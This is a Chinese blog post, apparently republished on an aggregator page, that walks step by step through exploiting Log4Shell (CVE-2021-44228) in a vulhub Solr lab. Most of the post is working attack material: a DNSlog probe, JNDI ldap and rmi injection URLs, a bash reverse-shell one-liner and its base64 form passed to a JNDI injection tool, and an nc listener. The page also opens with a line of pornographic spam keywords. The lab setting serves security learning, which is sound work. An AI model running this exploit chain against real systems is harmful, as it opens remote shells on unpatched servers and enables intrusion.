国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

log4j2漏洞CVE-2021-44228復(fù)現(xiàn)筆記(純步驟過(guò)程,沒(méi)有復(fù)雜的知識(shí)點(diǎn))

這篇具有很好參考價(jià)值的文章主要介紹了log4j2漏洞CVE-2021-44228復(fù)現(xiàn)筆記(純步驟過(guò)程,沒(méi)有復(fù)雜的知識(shí)點(diǎn))。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

前言:
Apache Log4j 2 是對(duì) Log4j 的升級(jí),它比其前身 Log4j 1.x 提供了顯著改進(jìn),并提供了 Logback 中可用的許多改進(jìn),同時(shí)修復(fù)了 Logback 架構(gòu)中的一些固有問(wèn)題。
2021 年 12 月,在 Apache Log4j2 中發(fā)現(xiàn)了一個(gè) 0-day 漏洞。Log4j 的 JNDI 支持并沒(méi)有限制可以解析的名稱(chēng)。一些協(xié)議像rmi:和ldap:是不安全的或者可以允許遠(yuǎn)程代碼執(zhí)行。

受影響版本:
Apache Log4j 2.x <= 2.14.1

正文:
環(huán)境搭建:
依托vulhub靶場(chǎng)搭建環(huán)境,漏洞啟動(dòng)目錄:

/vulhub-master/log4j/CVE-2021-44228

啟動(dòng)命令:

docker-compose up -d

啟動(dòng)成功后訪問(wèn)地址:http://192.168.0.110:8983/solr/#/
IP換成你自己的靶機(jī)IP即可
搭建效果:
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全漏洞復(fù)現(xiàn):
首先我們需要準(zhǔn)備一臺(tái)kali
工具用到的是大佬開(kāi)發(fā)的exp

https://github.com/bkfish/Apache-Log4j-Learning/

這里我們直接下載到kali中也可以,工具具體目錄在文件中的tools目錄下
我們直接開(kāi)始演示
先利用dnslog生成一個(gè)用于接收回參的網(wǎng)址
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全然后我們對(duì)目標(biāo)網(wǎng)站進(jìn)行測(cè)試,訪問(wèn)網(wǎng)址:

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:ldap://4wuy7v.dnslog.cn}

同樣是換成你自己的IP和生成的dnslog值即可
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全我們等十秒點(diǎn)擊第一個(gè)箭頭處的刷新就可以看到回顯,ok這里可以利用
我們繼續(xù)下一步,進(jìn)行nc的反彈shell
首先到kali中打開(kāi)我們事先準(zhǔn)備好的exp
解壓后到tools目錄下
構(gòu)造payload:

bash -i >& /dev/tcp/192.168.0.106/6969 0>&1

這里IP是kali的IP,端口是你等會(huì)nc監(jiān)聽(tīng)的端口
然后我們將這個(gè)加密為base64
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全直接使用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.106

這里echo后面就是你加密之后的值,最后面的IP還是kali的IP,回車(chē)啟動(dòng)
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全這里會(huì)生成兩個(gè)協(xié)議各一個(gè)執(zhí)行命令,這兩個(gè)協(xié)議在log4j2中都有執(zhí)行權(quán)限
我們使用第一個(gè),再次構(gòu)造一個(gè)payload

${jndi:rmi://192.168.0.106:1099/sm0syp}

到kali中開(kāi)啟nc

nc -lvvp 6969

log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全然后我們將這個(gè)payload插入到action的后面

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:rmi://192.168.0.106:1099/sm0syp}

回車(chē)直接訪問(wèn)
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全再次回到kali中我們可以看到nc成功反彈shell
log4j2 漏洞復(fù)現(xiàn) ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,筆記,安全,linux,運(yùn)維,網(wǎng)絡(luò)安全

裙:70844080
vx gzh:白安全組
作者:【白】

參考文章:文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-524281.html

https://blog.csdn.net/m0_56773673/article/details/122300927?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165236333216781483782069%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165236333216781483782069&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-5-122300927-null-null.142^v9^control,157^v4^control&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187
https://blog.csdn.net/weixin_43795682/article/details/123557217?ops_request_misc=&request_id=&biz_id=102&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-3-123557217.142^v9^control,157^v4^control&spm=1018.2226.3001.4187

到了這里,關(guān)于log4j2漏洞CVE-2021-44228復(fù)現(xiàn)筆記(純步驟過(guò)程,沒(méi)有復(fù)雜的知識(shí)點(diǎn))的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一個(gè)用于Java的日志記錄庫(kù),其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼 環(huán)境:vulhub 工具下載地址: ysoserial 利用工具生成payload: 1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功 2.查看反彈的shell 有點(diǎn)

    2024年02月11日
    瀏覽(36)
  • Log4j2遠(yuǎn)程命令執(zhí)行(CVE-2021-44228)

    Log4j2遠(yuǎn)程命令執(zhí)行(CVE-2021-44228)

    2.0 = Apache Log4j2= 2.14.1 啟動(dòng)服務(wù)后,進(jìn)入主頁(yè)面,點(diǎn)擊頁(yè)面中的???鏈接,跳轉(zhuǎn)到,目標(biāo)地址。 首先使用dnslog進(jìn)行測(cè)試,是否存在jndi注入的點(diǎn),再ceyedns平臺(tái)接收到了反饋的消息,發(fā)現(xiàn)此處存在jndi注入。 如果payload沒(méi)有進(jìn)行url編碼,可能會(huì)導(dǎo)致后臺(tái)無(wú)法解析,最好的方式就是

    2024年02月04日
    瀏覽(27)
  • log4j2漏洞原理和漏洞環(huán)境搭建復(fù)現(xiàn)

    log4j2漏洞原理和漏洞環(huán)境搭建復(fù)現(xiàn)

    目錄 1.背景 1.1影響版本 2.漏洞原理 2.1JNDI是什么 2.2LDAP是什么 2.3JNDI注入原因 2.4 log4j2是什么 3.漏洞復(fù)現(xiàn) 3.1準(zhǔn)備工作 3.1.1準(zhǔn)備惡意代碼 3.1.2將惡意代碼放到網(wǎng)站目錄下 3.1.3 LDAP服務(wù)器端 3.1.4客戶端搭建 3.1.5 執(zhí)行代碼 ?4.注意事項(xiàng) 部分資源在文章最后百度網(wǎng)盤(pán) 2021年11月24日,阿里

    2024年02月05日
    瀏覽(28)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫(xiě)的可靠、靈活的日志框架,是Apache旗下的一個(gè)開(kāi)源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過(guò)定義不同的日志級(jí)別,可以更加精確的控制日志的生成過(guò)程,

    2024年02月08日
    瀏覽(33)
  • Log4j2 反序列化漏洞與復(fù)現(xiàn)

    Log4j → Log for Java ,Apache的開(kāi)源日志記錄組件 JDK →1.8u21以下的版本 CVE-2021-44228 遠(yuǎn)程代碼執(zhí)行 →2.15.0修復(fù) CVE-2021-45046 拒絕服務(wù)Dos →2.16.0修復(fù) CVE-2021-45105 拒絕服務(wù)Dos →2.17.0修復(fù) CVE-2021-44832 遠(yuǎn)程代碼執(zhí)行 →2.17.1修復(fù) Log4j為了輸出日志時(shí)能輸出任意位置的Java對(duì)象,引入了Looku

    2024年02月05日
    瀏覽(29)
  • log4j2遠(yuǎn)程代碼執(zhí)行漏洞原理與漏洞復(fù)現(xiàn)(基于vulhub,保姆級(jí)的詳細(xì)教程)

    log4j2遠(yuǎn)程代碼執(zhí)行漏洞原理與漏洞復(fù)現(xiàn)(基于vulhub,保姆級(jí)的詳細(xì)教程)

    啥是log4j2? log4j2是apache下的java應(yīng)用常見(jiàn)的開(kāi)源日志庫(kù),是一個(gè)就Java的日志記錄工具。在log4j框架的基礎(chǔ)上進(jìn)行了改進(jìn),并引入了豐富的特性,可以控制日志信息輸送的目的地為控制臺(tái)、文件、GUI組建等,被應(yīng)用于業(yè)務(wù)系統(tǒng)開(kāi)發(fā),用于記錄程序輸入輸出日志信息。 啥是JNDI? 由

    2024年02月06日
    瀏覽(27)
  • log4j2漏洞分析

    log4j2漏洞分析

    和前面的JNDI注入時(shí)用的代碼差不多 如果要引入log4j2的jar包可以這么配置Maven的pom.xml 還要?jiǎng)?chuàng)建個(gè)配置文件 log4j2這個(gè)漏洞當(dāng)時(shí)爆出來(lái)的時(shí)候堪稱(chēng)是核彈級(jí)別的,危害非常大,利用還非常簡(jiǎn)單,既然如此,那我們肯定要分析一下漏洞相關(guān)的原理來(lái)學(xué)習(xí)一下 這個(gè)漏洞是個(gè)JNDI注入漏

    2024年02月09日
    瀏覽(32)
  • Java代碼審計(jì)15之Apache log4j2漏洞

    Java代碼審計(jì)15之Apache log4j2漏洞

    2.1、高版本測(cè)試 先說(shuō)結(jié)論,ldap協(xié)議, rmi協(xié)議 還有就是“ “${jndi:rmi://127.0.0.1:7778/exp}” ” 2.2、測(cè)試代碼 先引入組件, main.java jndiexp.java 2.3、補(bǔ)充之dns探測(cè) 2.3.1、rmi、ldap也可以dnslog探測(cè) 在使用dnslog探測(cè)漏洞的時(shí)候, 其實(shí)不僅僅dns協(xié)議可以,ldap和rmi協(xié)議也可以, 類(lèi)似的rmi,

    2024年02月10日
    瀏覽(29)
  • Log4j2的Configuration詳解

    官方配置文檔: https://logging.apache.org/log4j/2.x/manual/filters.html 根節(jié)點(diǎn) Configuration 參數(shù)介紹: Attribute Name Description name The name of the configuration. monitorInterval Log4j has the ability to automatically detect changes to the configuration file and reconfigure itself。 即動(dòng)態(tài)加載,單位是秒??勺远x配置,最小

    2023年04月09日
    瀏覽(23)
  • SpringBoot整合Log4j2日志框架

    SpringBoot整合Log4j2日志框架

    SpringBoot底層默認(rèn)使用logback日志框架。 切換使用Log4j2日志框架。 pom.xml配置 log4j2-spring.xml 文件命名固定 log4j2-spring.xml ,讓SpringBoot加載配置文件。 文件名為 log4j2.xml ,文件將繞過(guò)SpringBoot直接調(diào)用日志框架。 控制臺(tái)日志輸出信息 日志文件生成 說(shuō)明:日志文件生成在當(dāng)前項(xiàng)目下

    2024年03月09日
    瀏覽(40)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包